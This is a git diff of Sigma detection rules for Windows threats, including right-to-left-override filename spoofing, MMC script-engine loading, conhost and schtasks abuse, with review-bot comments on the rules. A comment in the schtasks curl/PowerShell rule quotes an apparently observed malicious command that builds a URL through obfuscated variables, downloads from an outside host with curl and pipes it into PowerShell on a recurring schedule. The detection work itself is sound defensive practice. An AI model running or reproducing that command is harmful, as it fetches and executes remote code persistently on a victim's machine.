diff --git a/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml b/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml
index abf9f22ac..b129b5936 100644
--- a/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml
@@ -9,8 +9,11 @@ description: |
 references:
 - https://redcanary.com/blog/right-to-left-override/
 - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
-author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems)
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+ - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
+author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
 date: 2024-11-17
+modified: 2025-02-06
 tags:
 - attack.execution
 - attack.defense-evasion
@@ -20,14 +23,30 @@ logsource:
 product: windows
 detection:
 selection_rtlo_unicode:
- TargetFilename|contains: '\u202e'
+ TargetFilename|contains:
+ - '\u202e' # Unicode RTLO character
+ - '[U+202E]'
 selection_extensions:
 TargetFilename|contains:
- - 'fpd..'
- - 'nls..'
- - 'vsc..'
- - 'xcod.'
- - 'xslx.'
+ - '3pm.' # Reversed `.mp3`
+ - '4pm.' # Reversed `.mp4`
+ - 'cod.' # Reversed `.doc`
+ - 'fdp.' # Reversed `.pdf`
+ - 'ftr.' # Reversed `.rtf`
+ - 'gepj.' # Reversed `.jpeg`
+ - 'gnp.' # Reversed `.png`
+ - 'gpj.' # Reversed `.jpg`
+ - 'ism.' # Reversed `.msi`
+ - 'lmth.' # Reversed `.html`
+ - 'nls.' # Reversed `.sln`
+ - 'piz.' # Reversed `.zip`
+ - 'slx.' # Reversed `.xls`
+ - 'tdo.' # Reversed `.odt`
+ - 'vsc.' # Reversed `.csv`
+ - 'vwm.' # Reversed `.wmv`
+ - 'xcod.' # Reversed `.docx`
+ - 'xslx.' # Reversed `.xlsx`
+ - 'xtpp.' # Reversed `.pptx`
 condition: all of selection_*
 falsepositives:
 - Filenames that contains scriptures such as arabic or hebrew might make use of this character
diff --git a/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml b/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml
new file mode 100644
index 000000000..a75549c00
--- /dev/null
+++ b/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml
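Review bot: The new `'\u202e'` entry under `TargetFilename|contains` is single-quoted, so YAML keeps it as the six literal characters backslash-u-2-0-2-e rather than the U+202E code point that the `# Unicode RTLO character` comment describes; unless the Sigma toolchain decodes `\u` escapes on its own (not something the hunk lets me confirm), neither this entry nor `'[U+202E]'` matches the raw character as it appears in a log. The same gap exists in the detection hunk of `proc_creation_win_susp_right_to_left_override.yml` later in this diff, where it is a regression: the double-quoted `"\u202e"` (a real code point) is replaced by the single-quoted `'\u202e'`. Keeping the decoded form next to the rendered ones covers both cases, e.g. `- "\u202e" # raw U+202E code point`, `- '\u202e' # escaped rendering used by some log pipelines`, `- '[U+202E]'`. The `condition: all of selection_*` still requires one of the reversed extensions, which keeps the longer extension list from widening the match on its own.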
@@ -0,0 +1,30 @@
+title: MMC Loading Script Engines DLLs
+id: a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad
+status: experimental
+description: |
+ Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+ to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+references:
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+ - https://www.elastic.co/security-labs/grimresource
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+ - attack.execution
+ - attack.defense-evasion
+ - attack.t1059.005
+ - attack.t1218.014
+logsource:
+ category: image_load
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\mmc.exe'
+ ImageLoaded|endswith:
+ - '\vbscript.dll'
+ - '\jscript.dll'
+ - '\jscript9.dll'
+ condition: selection
+falsepositives:
+ - Legitimate MMC operations or extensions loading these libraries
+level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml b/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml
index c144c3926..6d5449f66 100644
--- a/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml
+++ b/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml
@@ -1,5 +1,8 @@
 title: Uncommon Child Process Of Conhost.EXE
 id: 7dc2dedd-7603-461a-bc13-15803d132355
+related:
+ - id: dfa03a09-8b92-4d83-8e74-f72839b1c407
+ type: similar
 status: test
 description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
 references:
diff --git a/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml b/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml
new file mode 100644
index 000000000..5a303294e
--- /dev/null
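Review bot: The `description` of the new image_load rule is vague and hard to parse ("loads the DLL libraries like vbscript, jscript etc which might indicate"), while the detection is precise: only `\vbscript.dll`, `\jscript.dll` and `\jscript9.dll` under `ImageLoaded|endswith` are matched, so the text should say exactly that. Suggested wording: `Detects mmc.exe loading a Windows script engine DLL (vbscript.dll, jscript.dll or jscript9.dll), which can indicate script execution inside a trusted management process (see the GrimResource reference).` The `falsepositives` entry would also be more useful if it named which MMC extensions are known to load these engines, since that is what justifies `level: medium` rather than high.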
+++ b/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml
@@ -0,0 +1,44 @@
+title: Potentially Suspicious Child Processes Spawned by ConHost
+id: dfa03a09-8b92-4d83-8e74-f72839b1c407
+related:
+ - id: 7dc2dedd-7603-461a-bc13-15803d132355
+ type: similar
+status: experimental
+description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+references:
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+ - attack.t1202
+ - attack.defense-evasion
+ - attack.t1218
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_parent:
+ ParentImage|endswith: '\conhost.exe'
+ selection_child:
+ - Image|endswith:
+ - '\cmd.exe' # Windows Command Prompt
+ - '\cscript.exe' # Windows Script Host (used for scripting exploits)
+ - '\mshta.exe' # MSHTA (HTML Application Host, often abused)
+ - '\powershell_ise.exe' # PowerShell ISE
+ - '\powershell.exe' # Windows PowerShell
+ - '\pwsh.exe' # PowerShell Core
+ - '\regsvr32.exe' # Windows Registry Server (commonly used for exploits)
+ - '\wscript.exe' # Windows Script Host (for executing scripts)
+ - OriginalFileName:
+ - 'cmd.exe'
+ - 'cscript.exe'
+ - 'mshta.exe'
+ - 'powershell_ise.exe'
+ - 'powershell.exe'
+ - 'pwsh.dll'
+ - 'regsvr32.exe'
+ - 'wscript.exe'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml b/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml
new file mode 100644
index 000000000..588301102
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml
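Review bot: Two inline comments on the `Image|endswith` list are inaccurate and would mislead whoever tunes this rule: `regsvr32.exe` is the Microsoft Register Server (COM/DLL registration), not a "Windows Registry Server", and `cscript.exe` is the console Windows Script Host rather than something "used for scripting exploits". Suggested lines: `- '\cscript.exe' # Windows Script Host (console)` and `- '\regsvr32.exe' # Microsoft Register Server (LOLBIN, proxy execution)`. The `OriginalFileName` list carries `'pwsh.dll'` among `.exe` names, which is presumably deliberate because that is the resource name shipped in pwsh.exe, so a comment such as `# OriginalFileName of pwsh.exe is pwsh.dll, not a typo` would stop a later "fix". Whether the related rule `7dc2dedd-7603-461a-bc13-15803d132355` already fires on these same children cannot be judged from this diff, since only its metadata hunk is shown.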
@@ -0,0 +1,39 @@
+title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
+status: experimental
+description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+references:
+ - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
+ - https://en.wikipedia.org/wiki/Right-to-left_override
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+ - attack.execution
+ - attack.t1204.002
+ - attack.defense-evasion
+ - attack.t1218.014
+ - attack.t1036.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_image:
+ - Image|endswith: '\mmc.exe'
+ - OriginalFileName: 'MMC.exe'
+ selection_commandline:
+ CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
+ - 'cod.msc' # Reversed `.doc`
+ - 'fdp.msc' # Reversed `.pdf`
+ - 'ftr.msc' # Reversed `.rtf`
+ - 'lmth.msc' # Reversed `.html`
+ - 'slx.msc' # Reversed `.xls`
+ - 'tdo.msc' # Reversed `.odt`
+ - 'xcod.msc' # Reversed `.docx`
+ - 'xslx.msc' # Reversed `.xlsx`
+ - 'xtpp.msc' # Reversed `.pptx`
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+ - Unconventional but non-malicious usage of RLO or reversed extensions.
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml b/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml
new file mode 100644
index 000000000..eda760755
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml
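Review bot: The title and `description` attribute the match to RTLO abuse, but `selection_commandline` only looks for reversed-extension text such as `fdp.msc` and never requires the U+202E character, so any `mmc.exe` command line whose console file name simply ends in one of those strings also matches. Either the description should state that the rule keys on the reversed extension text alone (the raw character is covered by the separate proc_creation RTLO rule in this same diff), or an RTLO selection should be added if the log source is known to preserve the character. The inline comment on the `CommandLine|contains` line is garbled; suggested replacement: `# A file stored as "<name>" + U+202E + "fdp.msc" is rendered as "<name>csm.pdf", but the logged command line still contains the reversed extension "fdp.msc"`.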
@@ -0,0 +1,37 @@
+title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
+status: experimental
+description: |
+ Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+ This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+references:
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+ - attack.persistence
+ - attack.t1053.005
+ - attack.defense-evasion
+ - attack.t1218
+ - attack.command-and-control
+ - attack.t1105
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
+ selection_img:
+ Image|endswith: '\schtasks.exe'
+ CommandLine|contains|windash: ' /create '
+ selection_curl:
+ CommandLine|contains|all:
+ - 'curl '
+ - 'http'
+ - '-o'
+ selection_powershell:
+ CommandLine|contains: 'powershell'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate use of schtasks for administrative purposes.
+ - Automation scripts combining curl and PowerShell in controlled environments.
+level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml b/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml
new file mode 100644
index 000000000..2723c7d59
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml
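Review bot: `selection_img` only checks `Image|endswith: '\schtasks.exe'`, so a renamed copy of the binary is missed, whereas the sibling rule added in this same change (`proc_creation_win_schtasks_system_process.yml`) pairs the image check with `OriginalFileName: 'schtasks.exe'`; the two rules should use the same selector. Because `selection_img` here also carries the `windash` `/create` check, turning it into an OR-list means moving that check into its own selection, which `all of selection_*` still requires. The `'-o'` entry in `selection_curl` is a very short substring that also appears in `--output` and in hyphenated words, which is tolerable only because the other selections are mandatory; a one-line comment saying so (`# short on purpose: curl -o / -O; constrained by the other selections`) would keep a future tuner from widening it further.
```yaml
detection:
    # … unchanged: example command line comment …
    selection_img:
        - Image|endswith: '\schtasks.exe'
        - OriginalFileName: 'schtasks.exe'
    selection_create:
        CommandLine|contains|windash: ' /create '
    # … unchanged: selection_curl, selection_powershell, condition …
```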
@@ -0,0 +1,45 @@
+title: Scheduled Task Creation Masquerading as System Processes
+id: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab
+status: experimental
+description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+references:
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+ - attack.persistence
+ - attack.t1053.005
+ - attack.defense-evasion
+ - attack.t1036.004
+ - attack.t1036.005
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_img:
+ - Image|endswith: '\schtasks.exe'
+ - OriginalFileName: 'schtasks.exe'
+ selection_cli:
+ CommandLine|contains|windash: ' /create '
+ CommandLine|contains:
+ - ' audiodg'
+ - ' conhost'
+ - ' dwm.exe'
+ - ' explorer'
+ - ' lsass'
+ - ' lsm'
+ - ' mmc'
+ - ' msiexec'
+ - ' regsvr32'
+ - ' rundll32'
+ - ' services'
+ - ' spoolsv'
+ - ' svchost'
+ - ' taskeng'
+ - ' taskhost'
+ - ' wininit'
+ - ' winlogon'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate system administration tasks scheduling trusted system processes.
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml b/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml
index e6c3841b5..ca0089eb6 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml
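Review bot: The `CommandLine|contains` list in `selection_cli` applies bare names such as `' services'`, `' explorer'`, `' mmc'` and `' conhost'` to the whole schtasks command line, so a task name like `/tn "Update Services"` or a `/tr` value that legitimately launches `explorer.exe` matches, and the rule is rated `level: high`. The bare forms look deliberate (the example in the sibling curl/PowerShell rule uses `conhost` without `.exe`), so that trade-off should be recorded next to the list, e.g. `# Bare names on purpose: observed tasks launch e.g. "conhost --headless"; this also matches task names containing these words`, and the `falsepositives` entry should mention task names and descriptions rather than only "trusted system processes". If telemetry confirms the noise, lowering to `level: medium` or anchoring the most generic words (`' services.exe'`, `' explorer.exe'`) are the tuning options that keep the rest of the list intact.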
@@ -13,8 +13,10 @@ references:
 - https://redcanary.com/blog/right-to-left-override/
 - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
 - https://unicode-explorer.com/c/202E
-author: Micah Babinski, @micahbabinski
+ - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
 date: 2023-02-15
+modified: 2025-02-06
 tags:
 - attack.defense-evasion
 - attack.t1036.002
@@ -23,7 +25,9 @@ logsource:
 product: windows
 detection:
 selection:
- CommandLine|contains: "\u202e"
+ CommandLine|contains:
+ - '\u202e' # Unicode RTLO character
+ - '[U+202E]'
 condition: selection
 falsepositives:
 - Commandlines that contains scriptures such as arabic or hebrew might make use of this character